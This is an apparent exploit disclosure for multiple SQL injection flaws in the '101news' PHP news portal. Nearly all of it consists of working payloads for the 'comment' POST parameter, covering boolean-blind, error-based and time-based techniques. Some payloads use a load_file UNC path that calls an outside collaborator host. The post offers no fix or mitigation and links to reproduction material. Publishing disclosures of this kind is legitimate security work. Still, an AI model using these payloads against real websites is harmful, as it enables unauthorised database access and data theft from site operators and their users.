## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 02.02.2023 ## Vendor: https://mayurik.com/ ## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `comment` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+' was submitted in the comment parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. This system is absolutely UNPROTECTED! STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: comment (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(select load_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+'' ELSE 0x28 END)) AND 'RBgF'='RBgF&submit= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news) ## Proof and Exploit: [href](https://streamable.com/vrc7x8) ## Time spend: 01:00:00